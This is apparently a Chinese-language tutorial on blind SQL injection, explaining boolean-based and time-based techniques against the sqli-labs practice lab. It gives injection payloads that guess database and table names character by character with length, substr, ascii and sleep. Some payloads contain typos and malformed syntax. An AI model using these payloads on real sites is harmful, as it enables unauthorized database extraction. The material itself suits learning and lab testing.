sql注入——盲注

什么是盲注
普通的sql注入有相应的页面返回，而盲注没有相应的回显，比如报错信息等。

盲注分类：

 - 布尔盲注
特点：根据注入信息只会返回ture和false。
解决方案：根据结果判断是否和自己输入的值一直从而拆解出完整的数据。
 - 时间盲注
特点：界面只返回ture值，无论输入任何值，返回情况都会按正常的来处理。
解决方案：加入特定的时间函数，通过web页面返回的时间差判断注入的语句是否正确。

盲注涉及的函数

• length（） 返回字符串长度
• substr（str，num1，num2） 窃取字符串
• ascii（） 返回字符的ascii码
• sleep（n） 将程序休眠n秒钟
• if（expr1，expr2，expr3） 判断语句，如果语句1正确则执行语句二，反之则执行语句3

注入流程

1.判断注入点
2.爆字段数
3.爆字段显示位
4.爆库 （先猜长度，再猜名字）
5.爆表 （先猜长度，再猜名字）
6.爆字段 （先猜长度，再猜名字）
7.爆内容 （先猜数据的记录数,再对每个字段的长度和数据进行猜解)

---

sql布尔盲注

判断注入点
and 1=1 返回正常；and 1=2 返回错误。
是个注入点，但没返回出执行结果，判断为盲注。

爆库

先猜数据库名字长度

? id = 1 and length（database（））> 猜测数字	--+

这样不断的猜，最后猜出数据库名字长度。

再猜解数据库名字

? id = 1 and （ascii（substr（database（），1,1）））> 猜出数字	-- +

这样就猜解出数据库名字第一个字母

? id = 1 and （ascii（substr（database（），2，1）））>猜出数字	-- +

这样就猜解出数据库名字第二个字母
…
这样就猜解出了数据库名字

爆表
先猜表名长度

? id = 1 and （length（select table_naem from information_schema.tables where table_schema = database() ））>猜测数字 --+

再猜表名

? id = 1 and （ascii(substr(select table_naem from information_schema.tables where table_schema = database() ,1,1))）> 猜测数字 --+

爆字段
原理同上
爆内容
原理同上

由于过程较于复杂，这里就不一一例举了，原理大致和上面相同。

---

sql时间盲注

sql时间盲注则和布尔盲注类似，只是页面返回没有ture和false，只会返回正常页面。这时只要在次基础上添加个时间判断即可。

比如爆库的时候

if条件语句判断，如果ascii>116，则执行0,反之则执行sleep（3）休眠3秒。这里的0只是个占位符作用，没其他含义，也可以换成其他数字。

192.168.0.63/sqli-labs/Less-8/?id=1' and if(ascii(substr(database(),1,1))>116,0,sleep(3))--+

由上图可见，时间执行超过3秒，说明数据库名字的第一个字母是不大于116的。
这样不断的尝试就可以测出数据库名字了

注：

这上面的这个单引号 ' ,一定不能少，这是闭合前面的sql语句用的。